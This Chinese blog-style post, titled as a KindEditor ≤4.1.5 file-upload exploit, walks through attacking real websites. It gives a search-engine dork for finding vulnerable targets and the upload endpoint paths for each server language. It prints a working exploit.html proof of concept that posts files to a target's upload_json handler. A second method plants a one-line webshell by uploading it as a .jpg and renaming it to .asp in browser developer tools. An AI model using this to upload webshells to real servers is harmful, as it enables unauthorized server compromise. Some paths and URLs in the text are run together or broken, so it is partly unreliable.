一、KindEditor
KindEditor是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果
二、漏洞介绍
影响版本:KindEditor3.5.2~4.1
简介:Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持
Java、.NET、PHP、ASP等程序。
漏洞存在证明:
根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在
/asp/upload_json.asp//upload_json.ashx/jsp/upload_json.jsp/php/upload_json.php
可目录变量查看是否存在脚本上传漏洞:
kindeditor/asp/upload_json.asp?dir=filekindeditor//upload_json.ashx?dir=filekindeditor/jsp/upload_json.jsp?dir=filekindeditor/php/upload_json.php?dir=file
利用方式1
步骤:
通过搜索引擎找到目标,比如:搜索关键字 inurl:com/kindeditor通过访问/kindeditor/kindeditor.js,查看kindeditor版本是否含有漏洞(<=4.1.5)获得网站使用的开发语言,并确定kindeditor上传文件地址,各种语言上传地址如下:
/asp/upload_json.asp
//upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php创建exploit.html页面,编辑内容如下:
<html><head><title>kindeditor exploit</title><script src="http://www./kindeditor/kindeditor.js"></script><script>KindEditor.ready(function(K) {var uploadbutton = K.uploadbutton({button : K('#uploadButton')[0],fieldName : 'imgFile'url : 'http://【url】/kindeditor//upload_json.ashx?dir=file',afterUpload : function(data) {if (data.error === 0) {var url = K.formatUrl(data.url, 'absolute');K('#url').val(url);}},});uploadbutton.fileBox.change(function(e) {uploadbutton.submit();});});</script></head><body><div class="upload"><input type="button" id="uploadButton" value="Upload" /></div></body></html>
该poc上传到服务器后,即可执行上传操作:
利用方式2
打开编辑器,将一句话改名为1.jpg上传图片,
打开文件管理,进入“down”目录,跳至尾页,最后一个图片既是我们上传的一句话
点击改名
打开谷歌浏览器的审查元素
找到form表单
修改“jpg”为“asp”
名字修改为1保存
一句话就生成了,连接地址为
http://Madman.in/upfiles/down/1.asp
如果觉得《[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用》对你有帮助,请点赞、收藏,并留下你的观点哦!